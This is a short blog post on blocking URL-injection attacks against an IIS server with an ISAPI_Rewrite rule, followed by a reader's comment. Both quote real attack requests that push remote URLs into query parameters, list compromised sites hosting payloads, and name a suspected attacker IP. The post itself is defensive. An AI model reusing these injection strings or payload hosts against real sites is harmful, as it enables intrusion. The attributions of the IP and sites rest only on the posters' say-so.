query hackers - htaccess - Helicon - ISAPI - rewrite - Google
For several weeks now, I've been detecting hack attempts involving appending urls to my query strings. So instead of my actual query of 'Contact' or 'Item1' etc. I get someone’s link to a site that they have already compromised. Here are a few examples:
http://honamfishing.co.kr/phpmysqladmin/libraries/oduzov/nel... http://sans-packing.ru/img/jipeqap/ehudute/ http://sahel55.com/articles/omaduro/kimumid/ http://www.psikolojikyardim.org/etkinlik/include/eto/nixaz/ http://www.pattibus.it/phplib-7.2b/pages/ilosi/dohigal/
I found a few suggestions on how to block these but the best ones were all for Apache servers using .htaccess but I'm using MS Internet Information Server which doesn't have this feature. IIS uses ISAPI filters to work on incoming requests and one of them, URLSCAN, is customizable. So I tried blocking these types of queries with URLSCAN but that didn't work. Yesterday I found a solution that is working. I downloaded the free version of ISAPI_Rewrite from Helicon Tech. Here's their short description of the software:
"ISAPI_Rewrite is Apache mod_rewrite compatible URL rewriter for Microsoft IIS server (please see the compatibility chart). It is used for search engine optimization, to proxy another server's content, stop hotlinking or strengthen server security. It supports distributed .htaccess configuration files, enhanced regular expressions and nearly all mod_rewrite features. And there is also freeware Lite version of this product!"
This allows you to set up rules that will rewrite the http request before passing it on the web server. Sounds simple enough but I'd almost forgotten how tricky 'regular expressions' can be. Blocking the 'http:' in a query was pretty easy but it took me a while to figure out how to allow Google to use these for some gadgets that I host. In researching this, I found a nice quote..."if the solution to a problem includes regular expressions then you've still got a problem". With that in mind, I thought I'd post my solution here:
-----------------------------
RewriteEngine On
RewriteCond %{QUERY_STRING} ^.+http [NC]
RewriteCond %{QUERY_STRING} !google [NC]
RewriteRule .* - [L,F]
------------------------------
| Posted by John at 10:34:22 AM in Web Development (13) |
| --- |
Comments
1. gbuisman said...
I'm just looking through some log files and find this among a few others Fri 06 June 2008; 14.37 /stories.php?target=http%3A%2F%2Fwww.pattibus.it%2Fphplib-7.2b%2Fpages%2Fgodot%2Folule%2F Fri 06 June 2008; 14.37 /stories.php?target=http%3A%2F%2Fstoneproperties.co.uk%2Falbum%2Fincludes%2Fnohul%2Fzojaz%2F Fri 06 June 2008; 14.37 /stories.php?target=http%3A%2F%2Fwww.service-exposants.com%2Fstore%2Fiyi%2Fzobakiq%2F the hackers adres seems to be 85.88.11.140 adress: justgo.rohwerder-hinz.net I just run into the problem, and you seem to have some good information, so I think you might be interested. It seems the targetsites are using php3 I wonder if they can get any 'letal' information on me this way, I don't think so, as I wrote all the underlying code myself.
